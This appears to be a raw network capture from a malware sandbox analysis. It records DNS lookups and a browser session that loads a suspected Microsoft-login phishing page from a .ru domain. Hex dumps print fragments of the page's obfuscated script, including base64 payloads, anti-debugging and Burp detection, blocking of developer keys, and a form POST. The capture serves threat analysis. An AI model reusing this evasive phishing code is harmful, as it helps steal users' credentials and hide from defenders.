                                                                                                    Dec 23, 2024 19:11:43.647368908 CET1.1.1.1192.168.2.50xbcedNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:11:43.647584915 CET1.1.1.1192.168.2.50xb5a7No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                    Dec 23, 2024 19:11:43.694993019 CET1.1.1.1192.168.2.50x436No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:11:43.694993019 CET1.1.1.1192.168.2.50x436No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:11:43.695264101 CET1.1.1.1192.168.2.50x8a9eNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                    Dec 23, 2024 19:11:48.985395908 CET1.1.1.1192.168.2.50x9352No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:12:10.007534027 CET1.1.1.1192.168.2.50x487eNo error (0)myarjsrdezglg80afwvjrshtwwtkbxelf5dkmyvn3nwlfsrfgzy4cl5qa.bfcgpixdwnw.ru104.21.65.72A (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:12:10.007534027 CET1.1.1.1192.168.2.50x487eNo error (0)myarjsrdezglg80afwvjrshtwwtkbxelf5dkmyvn3nwlfsrfgzy4cl5qa.bfcgpixdwnw.ru172.67.189.38A (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:12:10.007630110 CET1.1.1.1192.168.2.50xf376No error (0)myarjsrdezglg80afwvjrshtwwtkbxelf5dkmyvn3nwlfsrfgzy4cl5qa.bfcgpixdwnw.ru65IN (0x0001)false
                                                                                                    Dec 23, 2024 19:12:13.544986963 CET1.1.1.1192.168.2.50xb65dNo error (0)myarjsrdezglg80afwvjrshtwwtkbxelf5dkmyvn3nwlfsrfgzy4cl5qa.bfcgpixdwnw.ru65IN (0x0001)false
                                                                                                    Dec 23, 2024 19:12:13.546350956 CET1.1.1.1192.168.2.50x2b24No error (0)myarjsrdezglg80afwvjrshtwwtkbxelf5dkmyvn3nwlfsrfgzy4cl5qa.bfcgpixdwnw.ru172.67.189.38A (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:12:13.546350956 CET1.1.1.1192.168.2.50x2b24No error (0)myarjsrdezglg80afwvjrshtwwtkbxelf5dkmyvn3nwlfsrfgzy4cl5qa.bfcgpixdwnw.ru104.21.65.72A (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:12:13.668466091 CET1.1.1.1192.168.2.50x30b8No error (0)www.microsoftonline.commicrosoftonline.comCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:12:13.703707933 CET1.1.1.1192.168.2.50xd88fNo error (0)www.microsoftonline.commicrosoftonline.comCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:12:13.848450899 CET1.1.1.1192.168.2.50x3cf3No error (0)www.microsoftonline.commicrosoftonline.comCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:12:14.108517885 CET8.8.8.8192.168.2.50x7981No error (0)google.com142.250.181.110A (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:12:14.114109993 CET1.1.1.1192.168.2.50x1deeNo error (0)google.com142.250.181.142A (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:12:15.127146959 CET1.1.1.1192.168.2.50xb0a8No error (0)www.microsoftonline.commicrosoftonline.comCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:12:15.128140926 CET1.1.1.1192.168.2.50x41dNo error (0)www.microsoftonline.commicrosoftonline.comCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:12:20.287801027 CET1.1.1.1192.168.2.50x8cdfNo error (0)www.microsoftonline.commicrosoftonline.comCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:12:20.288400888 CET1.1.1.1192.168.2.50x2a4bNo error (0)www.microsoftonline.commicrosoftonline.comCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:12:20.426796913 CET1.1.1.1192.168.2.50x1acfNo error (0)www.microsoftonline.commicrosoftonline.comCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:12:26.798640013 CET1.1.1.1192.168.2.50x373eNo error (0)www.microsoftonline.commicrosoftonline.comCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:12:26.799338102 CET1.1.1.1192.168.2.50xf6b0No error (0)www.microsoftonline.commicrosoftonline.comCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:12:26.940730095 CET1.1.1.1192.168.2.50x5b8dNo error (0)www.microsoftonline.commicrosoftonline.comCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:12:27.262264013 CET8.8.8.8192.168.2.50xf200No error (0)google.com142.250.181.110A (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:12:27.265786886 CET1.1.1.1192.168.2.50xf55fNo error (0)google.com142.250.181.142A (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:12:50.249475002 CET1.1.1.1192.168.2.50x60No error (0)www.microsoftonline.commicrosoftonline.comCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:12:57.278182983 CET1.1.1.1192.168.2.50x39b2No error (0)www.microsoftonline.commicrosoftonline.comCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:12:57.282582045 CET1.1.1.1192.168.2.50x3c90No error (0)www.microsoftonline.commicrosoftonline.comCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:12:57.422056913 CET1.1.1.1192.168.2.50x67f0No error (0)www.microsoftonline.commicrosoftonline.comCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:13:05.684077024 CET1.1.1.1192.168.2.50x8946No error (0)www.microsoftonline.commicrosoftonline.comCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:13:05.684811115 CET1.1.1.1192.168.2.50x4914No error (0)www.microsoftonline.commicrosoftonline.comCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:13:05.823678017 CET1.1.1.1192.168.2.50xf422No error (0)www.microsoftonline.commicrosoftonline.comCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:13:05.971766949 CET8.8.8.8192.168.2.50x12cdNo error (0)google.com142.250.181.110A (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:13:05.974591017 CET1.1.1.1192.168.2.50x3f24No error (0)google.com142.250.181.142A (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:13:22.552819014 CET1.1.1.1192.168.2.50xa9a5No error (0)www.microsoftonline.commicrosoftonline.comCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:14:05.985133886 CET1.1.1.1192.168.2.50xbba4No error (0)www.microsoftonline.commicrosoftonline.comCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:14:06.074131966 CET1.1.1.1192.168.2.50x1fd2No error (0)www.microsoftonline.commicrosoftonline.comCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:14:06.166995049 CET1.1.1.1192.168.2.50x55cNo error (0)www.microsoftonline.commicrosoftonline.comCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:14:07.252928972 CET1.1.1.1192.168.2.50x5c68No error (0)www.microsoftonline.commicrosoftonline.comCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:14:07.254036903 CET1.1.1.1192.168.2.50xabb3No error (0)www.microsoftonline.commicrosoftonline.comCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:14:07.400285006 CET8.8.8.8192.168.2.50x7761No error (0)google.com142.250.181.110A (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:14:07.402391911 CET1.1.1.1192.168.2.50x138bNo error (0)google.com172.217.17.46A (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:14:32.273049116 CET1.1.1.1192.168.2.50xdf26No error (0)www.microsoftonline.commicrosoftonline.comCNAME (Canonical name)IN (0x0001)false
                                                                                                    • n6b.kolivane.ru
                                                                                                    • https:
                                                                                                      • cdnjs.cloudflare.com
                                                                                                      • code.jquery.com
                                                                                                      • challenges.cloudflare.com
                                                                                                      • myarjsrdezglg80afwvjrshtwwtkbxelf5dkmyvn3nwlfsrfgzy4cl5qa.bfcgpixdwnw.ru
                                                                                                    • a.nel.cloudflare.com
                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    0192.168.2.549712172.67.143.1374434368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-23 18:11:38 UTC652OUTGET /da4scmQ/ HTTP/1.1
                                                                                                    Host: n6b.kolivane.ru
                                                                                                    Connection: keep-alive
                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                    Sec-Fetch-Mode: navigate
                                                                                                    Sec-Fetch-Dest: document
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2024-12-23 18:11:39 UTC1245INHTTP/1.1 200 OK
                                                                                                    Date: Mon, 23 Dec 2024 18:11:39 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    Cache-Control: no-cache, private
                                                                                                    cf-cache-status: DYNAMIC
                                                                                                    vary: accept-encoding
                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O37DvALLVi0AvPchrSCNP3Vfx2TEAg7pqEN7OYSvyrzP%2Bm5ho%2FRcZj620IcnHF%2F0PTh8mzBlSjAClp8pDKuaHpz%2FQEPHnVSTScREGqHWDpwJ5tgafa0%2FrPajWCkToA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1019&min_rtt=975&rtt_var=397&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=1556&delivery_rate=2921025&cwnd=252&unsent_bytes=0&cid=95c82340565c29fa&ts=417&x=0"
                                                                                                    Set-Cookie: XSRF-TOKEN=eyJpdiI6IlI1R25VOC9CSGRXZDRGb3ZJQndzM3c9PSIsInZhbHVlIjoiOWJrTkRYZVpZQzlhUGFBaXRneFdYWFNJK0wrOGJoSUhiaDlkVktoekNwcm41YVVtd2lJZk5hQ1loeFpsMU5rczM0UEdUN0RCMXZXM2xnVVJzenNweTM3VERFdFBFekVtZHhPQ1NtZFdCTFVLdDhSNDR2dTVRNnVwbldDc1U2NGIiLCJtYWMiOiI4M2Y3NWI3NWZhZTAzM2E5MTk3OTQzMTFlN2I0MjBkNDMzMWU4MWJjN2UyMmI0MWJmMzBjNGFlZjUxMTZlYjRiIiwidGFnIjoiIn0%3D; expires=Mon, 23-Dec-2024 20:11:39 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                                                    2024-12-23 18:11:39 UTC733INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6d 4e 31 62 47 6c 35 4d 57 68 74 64 6c 4a 43 63 33 42 68 57 6a 52 30 61 58 56 49 64 30 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 4d 45 67 76 52 56 56 44 59 53 39 49 62 58 68 54 56 6c 56 49 55 55 6c 68 55 56 6b 76 55 48 5a 56 52 69 39 36 54 6d 39 44 55 46 56 72 59 31 49 76 63 45 56 4d 5a 45 68 36 54 58 68 31 65 56 46 6d 53 6c 52 53 4d 7a 46 75 54 32 6c 77 56 6c 6c 77 57 47 68 48 57 57 5a 4a 51 7a 4e 6f 63 48 70 5a 62 47 52 7a 5a 47 74 46 56 44 5a 4e 57 56 70 6c 51 30 4e 48 59 56 64 52 53 55 4d 76 53 56 4a 51 56 45 64 6d 62 6b 67 7a 56 6d 39 43 51 53 74 6d 57 57 64 4d 55 57 73 33 51 55 67 76 61 47 70 50 52 44 5a 4b 63 32 78 30 63 54 67
                                                                                                    Data Ascii: Set-Cookie: laravel_session=eyJpdiI6ImN1bGl5MWhtdlJCc3BhWjR0aXVId0E9PSIsInZhbHVlIjoiMEgvRVVDYS9IbXhTVlVIUUlhUVkvUHZVRi96Tm9DUFVrY1IvcEVMZEh6TXh1eVFmSlRSMzFuT2lwVllwWGhHWWZJQzNocHpZbGRzZGtFVDZNWVplQ0NHYVdRSUMvSVJQVEdmbkgzVm9CQStmWWdMUWs3QUgvaGpPRDZKc2x0cTg
                                                                                                    2024-12-23 18:11:39 UTC1369INData Raw: 34 64 36 61 0d 0a 3c 21 2d 2d 20 53 75 63 63 65 73 73 20 69 73 20 77 61 6c 6b 69 6e 67 20 66 72 6f 6d 20 66 61 69 6c 75 72 65 20 74 6f 20 66 61 69 6c 75 72 65 20 77 69 74 68 20 6e 6f 20 6c 6f 73 73 20 6f 66 20 65 6e 74 68 75 73 69 61 73 6d 2e 20 2d 2d 3e 0d 0a 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 2f 2a 20 49 66 20 79 6f 75 20 72 65 61 6c 6c 79 20 6c 6f 6f 6b 20 63 6c 6f 73 65 6c 79 2c 20 6d 6f 73 74 20 6f 76 65 72 6e 69 67 68 74 20 73 75 63 63 65 73 73 65 73 20 74 6f 6f 6b 20 61 20 6c 6f 6e 67 20 74 69 6d 65 2e 20 2a 2f 0d 0a 69 66 28 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 39 4f 4e 6b 49 75 61 32 39 73 61 58 5a 68 62 6d 55 75 63 6e 55 76 5a 47 45 30 63 32 4e 74 55 53 38 3d 22 29 20 3d 3d 20 22 6e 6f 6d 61 74 63 68 22 29 7b 0d 0a 64 6f 63 75 6d 65
                                                                                                    Data Ascii: 4d6a... Success is walking from failure to failure with no loss of enthusiasm. --><script>/* If you really look closely, most overnight successes took a long time. */if(atob("aHR0cHM6Ly9ONkIua29saXZhbmUucnUvZGE0c2NtUS8=") == "nomatch"){docume
                                                                                                    2024-12-23 18:11:39 UTC1369INData Raw: 6a 45 75 4e 58 4a 6c 62 54 74 39 44 51 70 39 44 51 6f 6a 54 58 5a 4a 52 56 4e 71 51 6d 68 71 52 43 42 77 65 32 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 4d 44 74 74 59 58 4a 6e 61 57 34 74 59 6d 39 30 64 47 39 74 4f 6a 46 79 5a 57 30 37 66 51 30 4b 49 30 31 32 53 55 56 54 61 6b 4a 6f 61 6b 51 75 59 32 46 77 64 47 4e 6f 59 53 31 6a 62 32 35 30 59 57 6c 75 5a 58 4a 37 63 47 39 7a 61 58 52 70 62 32 34 36 49 48 4a 6c 62 47 46 30 61 58 5a 6c 4f 33 52 76 63 44 6f 67 4e 6a 4e 77 65 44 73 76 4b 6e 64 70 5a 48 52 6f 4f 69 41 78 4d 44 41 6c 4f 79 6f 76 63 47 46 6b 5a 47 6c 75 5a 79 31 79 61 57 64 6f 64 44 6f 67 64 6d 46 79 4b 43 30 74 59 6e 4d 74 5a 33 56 30 64 47 56 79 4c 58 67 73 49 43 34 33 4e 58 4a 6c 62 53 6b 37 63 47 46 6b 5a 47 6c 75 5a 79 31 73 5a 57 5a 30
                                                                                                    Data Ascii: jEuNXJlbTt9DQp9DQojTXZJRVNqQmhqRCBwe21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOjFyZW07fQ0KI012SUVTakJoakQuY2FwdGNoYS1jb250YWluZXJ7cG9zaXRpb246IHJlbGF0aXZlO3RvcDogNjNweDsvKndpZHRoOiAxMDAlOyovcGFkZGluZy1yaWdodDogdmFyKC0tYnMtZ3V0dGVyLXgsIC43NXJlbSk7cGFkZGluZy1sZWZ0
                                                                                                    2024-12-23 18:11:39 UTC1369INData Raw: 64 75 4a 79 77 67 5a 6e 56 75 59 33 52 70 62 32 34 6f 5a 58 5a 6c 62 6e 51 70 49 48 73 4e 43 69 41 67 49 43 42 70 5a 69 41 6f 5a 58 5a 6c 62 6e 51 75 61 32 56 35 51 32 39 6b 5a 53 41 39 50 54 30 67 4d 54 49 7a 4b 53 42 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 56 32 5a 57 35 30 4c 6e 42 79 5a 58 5a 6c 62 6e 52 45 5a 57 5a 68 64 57 78 30 4b 43 6b 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 48 4a 6c 64 48 56 79 62 69 42 6d 59 57 78 7a 5a 54 73 4e 43 69 41 67 49 43 42 39 44 51 6f 4e 43 69 41 67 49 43 42 70 5a 69 41 6f 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 68 6c 64 6d 56 75 64 43 35 6a 64 48 4a 73 53 32 56 35 49 43 59 6d 49 47 56 32 5a 57 35 30 4c 6d 74 6c 65 55 4e 76 5a 47 55 67 50 54 30 39 49 44 67 31 4b 53 42 38 66 41 30 4b 49 43 41 67 49 43 41 67 49
                                                                                                    Data Ascii: duJywgZnVuY3Rpb24oZXZlbnQpIHsNCiAgICBpZiAoZXZlbnQua2V5Q29kZSA9PT0gMTIzKSB7DQogICAgICAgIGV2ZW50LnByZXZlbnREZWZhdWx0KCk7DQogICAgICAgIHJldHVybiBmYWxzZTsNCiAgICB9DQoNCiAgICBpZiAoDQogICAgICAgIChldmVudC5jdHJsS2V5ICYmIGV2ZW50LmtleUNvZGUgPT09IDg1KSB8fA0KICAgICAgI
                                                                                                    2024-12-23 18:11:39 UTC1369INData Raw: 67 49 43 41 67 49 43 41 67 49 47 4e 76 62 6e 4e 30 49 47 46 5a 62 6b 56 36 63 30 52 6f 65 57 59 67 50 53 42 77 5a 58 4a 6d 62 33 4a 74 59 57 35 6a 5a 53 35 75 62 33 63 6f 4b 54 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 5a 47 56 69 64 57 64 6e 5a 58 49 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 4e 76 62 6e 4e 30 49 47 31 42 63 6e 42 54 5a 6e 42 70 51 58 67 67 50 53 42 77 5a 58 4a 6d 62 33 4a 74 59 57 35 6a 5a 53 35 75 62 33 63 6f 4b 54 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 61 57 59 67 4b 47 31 42 63 6e 42 54 5a 6e 42 70 51 58 67 67 4c 53 42 68 57 57 35 46 65 6e 4e 45 61 48 6c 6d 49 44 34 67 56 56 46 46 54 33 4e 72 59 55 31 50 63 69 41 6d 4a 69 41 68 5a 6b 4a 35 63 56 70 45 63 6c 46 53 52 69 6b 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 41 67 49 43
                                                                                                    Data Ascii: gICAgICAgIGNvbnN0IGFZbkV6c0RoeWYgPSBwZXJmb3JtYW5jZS5ub3coKTsNCiAgICAgICAgZGVidWdnZXI7DQogICAgICAgIGNvbnN0IG1BcnBTZnBpQXggPSBwZXJmb3JtYW5jZS5ub3coKTsNCiAgICAgICAgaWYgKG1BcnBTZnBpQXggLSBhWW5FenNEaHlmID4gVVFFT3NrYU1PciAmJiAhZkJ5cVpEclFSRikgew0KICAgICAgICAgIC
                                                                                                    2024-12-23 18:11:39 UTC1369INData Raw: 59 57 31 6c 50 53 4a 69 62 48 52 6b 64 57 45 69 49 48 5a 68 62 48 56 6c 50 53 4a 56 62 6d 74 75 62 33 64 75 49 6a 34 4e 43 6a 78 70 62 6e 42 31 64 43 42 30 65 58 42 6c 50 53 4a 6f 61 57 52 6b 5a 57 34 69 49 47 6c 6b 50 53 4a 69 62 48 52 6b 5a 47 46 30 59 53 49 67 62 6d 46 74 5a 54 30 69 59 6d 78 30 5a 47 52 68 64 47 45 69 49 48 5a 68 62 48 56 6c 50 53 49 69 50 67 30 4b 50 43 39 6d 62 33 4a 74 50 67 30 4b 50 43 39 6b 61 58 59 2b 44 51 6f 38 5a 47 6c 32 49 47 4e 73 59 58 4e 7a 50 53 4a 30 5a 58 68 30 4c 57 4e 6c 62 6e 52 6c 63 69 49 67 61 57 51 39 49 6c 70 74 54 6e 42 73 51 6b 78 30 59 33 49 69 50 67 30 4b 52 58 68 6c 59 33 56 30 61 57 35 6e 49 47 4a 79 62 33 64 7a 5a 58 49 67 63 32 56 6a 64 58 4a 70 64 48 6b 67 59 32 68 6c 59 32 74 7a 49 47 5a 76 63 69 42
                                                                                                    Data Ascii: YW1lPSJibHRkdWEiIHZhbHVlPSJVbmtub3duIj4NCjxpbnB1dCB0eXBlPSJoaWRkZW4iIGlkPSJibHRkZGF0YSIgbmFtZT0iYmx0ZGRhdGEiIHZhbHVlPSIiPg0KPC9mb3JtPg0KPC9kaXY+DQo8ZGl2IGNsYXNzPSJ0ZXh0LWNlbnRlciIgaWQ9IlptTnBsQkx0Y3IiPg0KRXhlY3V0aW5nIGJyb3dzZXIgc2VjdXJpdHkgY2hlY2tzIGZvciB
                                                                                                    2024-12-23 18:11:39 UTC1369INData Raw: 45 39 74 51 30 5a 59 65 57 4e 34 52 47 67 73 49 48 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 62 57 56 30 61 47 39 6b 4f 69 41 69 55 45 39 54 56 43 49 73 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 4a 76 5a 48 6b 36 49 47 35 6c 64 79 42 47 62 33 4a 74 52 47 46 30 59 53 68 6c 61 46 64 36 52 6d 52 48 52 45 46 4f 4b 51 30 4b 49 43 41 67 49 48 30 70 4c 6e 52 6f 5a 57 34 6f 63 6d 56 7a 63 47 39 75 63 32 55 67 50 54 34 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 79 5a 58 52 31 63 6d 34 67 63 6d 56 7a 63 47 39 75 63 32 55 75 61 6e 4e 76 62 69 67 70 4f 77 30 4b 49 43 41 67 49 48 30 70 4c 6e 52 6f 5a 57 34 6f 5a 47 46 30 59 53 41 39 50 69 42 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 6c 6d 4b 47 52 68 64 47 46 62 4a 33 4e 30 59 58 52 31 63 79 64 64 49 44 30 39
                                                                                                    Data Ascii: E9tQ0ZYeWN4RGgsIHsNCiAgICAgICAgbWV0aG9kOiAiUE9TVCIsDQogICAgICAgIGJvZHk6IG5ldyBGb3JtRGF0YShlaFd6RmRHREFOKQ0KICAgIH0pLnRoZW4ocmVzcG9uc2UgPT4gew0KICAgICAgICByZXR1cm4gcmVzcG9uc2UuanNvbigpOw0KICAgIH0pLnRoZW4oZGF0YSA9PiB7DQogICAgICAgIGlmKGRhdGFbJ3N0YXR1cyddID09
                                                                                                    2024-12-23 18:11:39 UTC1369INData Raw: 48 48 68 4d 53 72 71 63 2e 68 6f 73 74 6e 61 6d 65 2e 73 70 6c 69 74 28 27 2e 27 29 2e 73 6c 69 63 65 28 2d 32 29 2e 6a 6f 69 6e 28 27 2e 27 29 3b 0d 0a 2f 2a 20 54 68 65 20 6f 6e 6c 79 20 77 61 79 20 74 6f 20 64 6f 20 67 72 65 61 74 20 77 6f 72 6b 20 69 73 20 74 6f 20 6c 6f 76 65 20 77 68 61 74 20 79 6f 75 20 64 6f 2e 20 2a 2f 0d 0a 69 66 28 5a 68 70 78 63 77 4e 71 73 43 20 3d 3d 20 6d 6d 42 42 70 65 47 4d 67 67 29 7b 0d 0a 63 6f 6e 73 74 20 57 6f 4f 6b 76 46 71 76 58 46 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2e 73 70 6c 69 74 28 27 25 32 33 27 29 5b 30 5d 2e 73 70 6c 69 74 28 27 25 33 46 27 29 5b 30 5d 3b 0d 0a 69 66 20 28 75 73 48 48 68 4d 53 72 71 63 2e 70 61 74 68 6e 61 6d 65 2e 65 6e 64 73 57 69 74 68 28 27
                                                                                                    Data Ascii: HHhMSrqc.hostname.split('.').slice(-2).join('.');/* The only way to do great work is to love what you do. */if(ZhpxcwNqsC == mmBBpeGMgg){const WoOkvFqvXF = window.location.pathname.split('%23')[0].split('%3F')[0];if (usHHhMSrqc.pathname.endsWith('
                                                                                                    2024-12-23 18:11:39 UTC1369INData Raw: 77 4d 44 74 73 61 57 35 6c 4c 57 68 6c 61 57 64 6f 64 44 6f 78 4c 6a 49 37 66 51 30 4b 49 30 31 32 53 55 56 54 61 6b 4a 6f 61 6b 51 67 61 44 52 37 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 6d 4e 68 62 47 4d 6f 4d 53 34 7a 4b 54 74 39 44 51 70 41 62 57 56 6b 61 57 45 67 4b 47 31 70 62 69 31 33 61 57 52 30 61 44 6f 78 4d 6a 41 77 63 48 67 70 65 77 30 4b 49 30 31 32 53 55 56 54 61 6b 4a 6f 61 6b 51 67 61 44 52 37 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 6a 45 75 4e 58 4a 6c 62 54 74 39 44 51 70 39 44 51 6f 6a 54 58 5a 4a 52 56 4e 71 51 6d 68 71 52 43 42 77 65 32 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 4d 44 74 74 59 58 4a 6e 61 57 34 74 59 6d 39 30 64 47 39 74 4f 6a 46 79 5a 57 30 37 66 51 30 4b 49 30 31 32 53 55 56 54 61 6b 4a 6f 61 6b 51 75 59 32 46 77 64 47
                                                                                                    Data Ascii: wMDtsaW5lLWhlaWdodDoxLjI7fQ0KI012SUVTakJoakQgaDR7Zm9udC1zaXplOmNhbGMoMS4zKTt9DQpAbWVkaWEgKG1pbi13aWR0aDoxMjAwcHgpew0KI012SUVTakJoakQgaDR7Zm9udC1zaXplOjEuNXJlbTt9DQp9DQojTXZJRVNqQmhqRCBwe21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOjFyZW07fQ0KI012SUVTakJoakQuY2FwdG
                                                                                                    2024-12-23 18:11:39 UTC1369INData Raw: 64 47 39 79 4c 6e 56 7a 5a 58 4a 42 5a 32 56 75 64 43 35 70 62 6d 4e 73 64 57 52 6c 63 79 67 69 51 6e 56 79 63 43 49 70 4b 53 42 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 48 64 70 62 6d 52 76 64 79 35 73 62 32 4e 68 64 47 6c 76 62 69 41 39 49 43 4a 68 59 6d 39 31 64 44 70 69 62 47 46 75 61 79 49 37 44 51 70 39 44 51 70 6b 62 32 4e 31 62 57 56 75 64 43 35 68 5a 47 52 46 64 6d 56 75 64 45 78 70 63 33 52 6c 62 6d 56 79 4b 43 64 72 5a 58 6c 6b 62 33 64 75 4a 79 77 67 5a 6e 56 75 59 33 52 70 62 32 34 6f 5a 58 5a 6c 62 6e 51 70 49 48 73 4e 43 69 41 67 49 43 42 70 5a 69 41 6f 5a 58 5a 6c 62 6e 51 75 61 32 56 35 51 32 39 6b 5a 53 41 39 50 54 30 67 4d 54 49 7a 4b 53 42 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 56 32 5a 57 35 30 4c 6e 42 79 5a 58 5a 6c 62 6e 52
                                                                                                    Data Ascii: dG9yLnVzZXJBZ2VudC5pbmNsdWRlcygiQnVycCIpKSB7DQogICAgICAgIHdpbmRvdy5sb2NhdGlvbiA9ICJhYm91dDpibGFuayI7DQp9DQpkb2N1bWVudC5hZGRFdmVudExpc3RlbmVyKCdrZXlkb3duJywgZnVuY3Rpb24oZXZlbnQpIHsNCiAgICBpZiAoZXZlbnQua2V5Q29kZSA9PT0gMTIzKSB7DQogICAgICAgIGV2ZW50LnByZXZlbnR


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    1192.168.2.549718104.17.25.144434368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-23 18:11:41 UTC649OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                                                                                    Host: cdnjs.cloudflare.com
                                                                                                    Connection: keep-alive
                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                    Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                    Accept: */*
                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                    Sec-Fetch-Dest: script
                                                                                                    Referer: https://n6b.kolivane.ru/
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
